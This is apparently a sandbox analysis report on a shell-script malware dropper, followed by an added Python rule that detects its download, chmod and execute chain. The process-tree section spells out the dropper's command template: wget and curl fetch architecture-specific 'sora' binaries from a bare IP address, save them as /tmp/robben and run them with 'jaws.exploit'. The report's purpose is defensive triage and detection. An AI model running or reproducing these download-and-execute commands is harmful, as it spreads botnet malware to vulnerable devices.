Analysis
max time kernel:   34s
max time network:  33s
platform:          debian-9_mips
resource:          debian9-mipsbe-20240729-en
resource tags:     arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted:         18/10/2024, 01:47
Static task
static1

Behavioral tasks (all four run the same sample, 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh):
behavioral1   ubuntu1804-amd64-20240611-en
behavioral2   debian9-armhf-20240611-en
behavioral3   debian9-mipsbe-20240729-en
behavioral4   debian9-mipsel-20240611-en

The platform and resource in the header (debian-9_mips, debian9-mipsbe-20240729-en) are those of behavioral3, so the signatures and process tree on this page come from the big-endian MIPS run; the other three runs are not shown here.
General
Target:  5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Size:    2KB
MD5:     891d1dcbed8ea0751d0c0d0fec39ae18
SHA1:    57db06f345b0d9b4e2a7f4a502678a82ed792174
SHA256:  5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
SHA512:  20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
(nothing extracted)

Signatures

File and Directory Permissions Modification  (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Here: fourteen chmod +x invocations, one per architecture iteration of the dropper, each making the staged binary executable before it is run.
pid   Process
729   chmod
735   chmod
741   chmod
754   chmod
769   chmod
785   chmod
805   chmod
816   chmod
822   chmod
830   chmod
847   chmod
863   chmod
879   chmod
885   chmod

Executes dropped EXE  (14 IoCs)
Fourteen launches of the staged file, one per iteration; the path is the same every time.
ioc          pid   Process
/tmp/robben  730   robben
/tmp/robben  736   robben
/tmp/robben  742   robben
/tmp/robben  755   robben
/tmp/robben  770   robben
/tmp/robben  786   robben
/tmp/robben  806   robben
/tmp/robben  817   robben
/tmp/robben  823   robben
/tmp/robben  831   robben
/tmp/robben  848   robben
/tmp/robben  865   robben
/tmp/robben  880   robben
/tmp/robben  886   robben

Reads runtime system information  (14 IoCs)
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
(the same row repeats fourteen times, once per curl invocation)
Caveat: this is not discovery by the sample. A crypto library that curl loads checks the kernel FIPS flag when it initialises, so the row appears for every curl run on this image regardless of the URL. Treat it as noise when triaging.

System Network Configuration Discovery  (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
pid   Process
732   wget
733   curl
734   cat
All three PIDs belong to the sora.mips iteration, the one whose architecture matches the sandbox host (mipsbe); the other thirteen iterations are not tagged.

Writes file to tmp directory  (1 IoC)
Malware often drops required files in the /tmp directory.
description                   ioc          Process
File opened for modification  /tmp/robben  5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
The write is attributed to the dropper shell itself, not to cat, curl or wget. That is what you see when the script redirects the output of `cat sora.<arch>` into robben: the shell, not cat, opens the output file, so the redirect never shows up in any child's command line.
Processes

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh   PID 699
  Signature: Writes file to tmp directory

Under PID 699 the dropper spawns the same five commands fourteen times, once per architecture suffix. The per-iteration template, with <arch> taken from the table below, is:

  /usr/bin/wget   wget http://93.123.85.141/bins/sora.<arch>
  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.<arch>
                  Signature: Reads runtime system information
  /bin/cat        cat sora.<arch>
  /bin/chmod      chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi
                  Signature: File and Directory Permissions Modification
  /tmp/robben     ./robben jaws.exploit
                  Signature: Executes dropped EXE

  <arch>      wget   curl   cat    chmod  robben   notes
  x86          703    727   728      729     730
  mips         732    733   734      735     736   wget, curl and cat also tagged System Network Configuration Discovery
  x86_64       738    739   740      741     742
  i468         744    746   752      754     755   suffix as written in the fetched URL
  i686         758    761   766      769     770
  mpsl         773    776   783      785     786
  arm4         789    792   802      805     806
  arm5         808    814   815      816     817
  arm6         819    820   821      822     823
  arm7         825    826   827      830     831
  ppc          833    837   845      847     848   chmod argument list is only the .sh and robben from here on
  ppc440fp     851    854   862      863     865   (same)
  m68k         867    871   878      879     880   (same)
  sh4          882    883   884      885     886   (same)

Reading the chain:

- wget followed by curl -O on the same URL is a fallback for whichever client the victim happens to have; both run unconditionally, which is why every URL appears twice in the tree.
- cat sora.<arch> has no visible redirect, yet the only process that opens /tmp/robben for writing is the shell (see Writes file to tmp directory). That is consistent with `cat sora.<arch> > robben` in the script: each downloaded binary is copied to the fixed name robben before execution, so the executed path is identical in all fourteen iterations.
- The chmod argument list is the full contents of /tmp at the time (the script, robben, and a systemd-private temporary directory), which is what a `chmod +x *` run from /tmp expands to. From the ppc iteration onward the systemd-private directory has disappeared and only two names remain. If that reading is right, no sora.<arch> file was ever present in /tmp when chmod ran, i.e. the fetches did not leave a file in this run.
- ./robben jaws.exploit is executed with the same argument every time, whether or not the preceding fetch succeeded. The dropper does not query the host architecture (no uname or similar appears in the tree); it simply tries every binary in turn, and on this mipsbe host only the sora.mips iteration could have produced a native executable.
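The fourteen iterations above are one five-step pattern with only the architecture suffix changed, which is exactly the shape a process-chain rule should key on rather than on the URL or file name. The Python below is an added example written for this page; it is not part of the sandbox report and not the sample's own code. It rebuilds the process tree from the PIDs transcribed above as a constructed event list and runs a chain detector over it: an execution from a world-writable directory that, under the same parent, was preceded by a download from a bare-IP URL and a chmod +x of that path. The parent PID (699) and working directory (/tmp) are assumptions, since the report shows neither, as are the function and field names; in a real deployment the same function would be fed auditd execve records or the sandbox's JSON export.

```python
"""Detect the fetch -> chmod +x -> execute-from-/tmp chain seen in the process tree.

Added example for this page; not part of the sandbox report and not the sample's
own code.  The event list is reconstructed from the PIDs transcribed above.
Parent PID (699) and working directory (/tmp) are assumptions: the report does
not expose them, but every command uses bare filenames that resolve in /tmp.
"""
import re

SCRIPT = "5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh"
BASE_URL = "http://93.123.85.141/bins/sora."
TMPDIR = "systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi"

# (arch, wget, curl, cat, chmod, robben) PIDs, one row per iteration, from the report.
ITERATIONS = [
    ("x86",      703, 727, 728, 729, 730),
    ("mips",     732, 733, 734, 735, 736),
    ("x86_64",   738, 739, 740, 741, 742),
    ("i468",     744, 746, 752, 754, 755),
    ("i686",     758, 761, 766, 769, 770),
    ("mpsl",     773, 776, 783, 785, 786),
    ("arm4",     789, 792, 802, 805, 806),
    ("arm5",     808, 814, 815, 816, 817),
    ("arm6",     819, 820, 821, 822, 823),
    ("arm7",     825, 826, 827, 830, 831),
    ("ppc",      833, 837, 845, 847, 848),
    ("ppc440fp", 851, 854, 862, 863, 865),
    ("m68k",     867, 871, 878, 879, 880),
    ("sh4",      882, 883, 884, 885, 886),
]


def build_events():
    """Constructed input: (pid, ppid, exe, argv) records in execution order."""
    events = [(699, 1, "/tmp/" + SCRIPT, [SCRIPT])]
    for i, (arch, wget, curl, cat, chmod, run) in enumerate(ITERATIONS):
        url = BASE_URL + arch
        chmod_argv = ["chmod", "+x", SCRIPT, "robben"]
        if i < 10:  # the systemd-private dir is absent from the last four chmod calls
            chmod_argv.append(TMPDIR)
        events += [
            (wget,  699, "/usr/bin/wget", ["wget", url]),
            (curl,  699, "/usr/bin/curl", ["curl", "-O", url]),
            (cat,   699, "/bin/cat",      ["cat", "sora." + arch]),
            (chmod, 699, "/bin/chmod",    chmod_argv),
            (run,   699, "/tmp/robben",   ["./robben", "jaws.exploit"]),
        ]
    return events


# Bare-IP http(s) URL: no DNS involved, a dropper trait worth scoring on its own.
BARE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*")
FETCHERS = {"/usr/bin/wget", "/usr/bin/curl"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def detect_tmp_dropper(events, cwd="/tmp"):
    """Alert on every exec from a world-writable dir that, under the same parent,
    was preceded by a bare-IP download and a chmod +x of that path.
    Returns (alerts, iocs)."""
    per_parent = {}
    alerts = []
    iocs = {"urls": set(), "ips": set(), "dropped": set(), "args": set()}
    for pid, ppid, exe, argv in events:
        st = per_parent.setdefault(ppid, {"urls": [], "chmod": set()})
        if exe in FETCHERS:
            for m in filter(None, map(BARE_IP_URL.search, argv)):
                st["urls"].append(m.group(0))
                iocs["urls"].add(m.group(0))
                iocs["ips"].add(m.group(1))
        elif exe == "/bin/chmod" and "+x" in argv:
            for f in argv[1:]:
                if f.startswith(("+", "-")):
                    continue  # mode or option, not a file
                st["chmod"].add(f if f.startswith("/") else f"{cwd}/{f}")
        elif exe.startswith(WRITABLE_DIRS) and exe in st["chmod"] and st["urls"]:
            alerts.append({"pid": pid, "exe": exe, "argv": argv, "url": st["urls"][-1]})
            iocs["dropped"].add(exe)
            iocs["args"].update(argv[1:])
    return alerts, iocs


if __name__ == "__main__":
    alerts, iocs = detect_tmp_dropper(build_events())
    print(f"{len(alerts)} executions of a downloaded file from a writable dir")
    for a in alerts:
        print(f"  pid {a['pid']}: {' '.join(a['argv'])}  (last fetch: {a['url']})")
    print("IPs:", sorted(iocs["ips"]), "dropped:", sorted(iocs["dropped"]))
```

The rule deliberately keys on the sequence (download, chmod +x, exec) under one parent rather than on the string robben or the IP, so it would still fire if the next sample renamed the staged file or moved to a new host. The cat-to-robben redirect is invisible in execve data, which is why the chmod target, not the downloaded name, is what gets linked to the exec; a file-open event stream (as in the Writes file to tmp directory IoC) would let you close that gap.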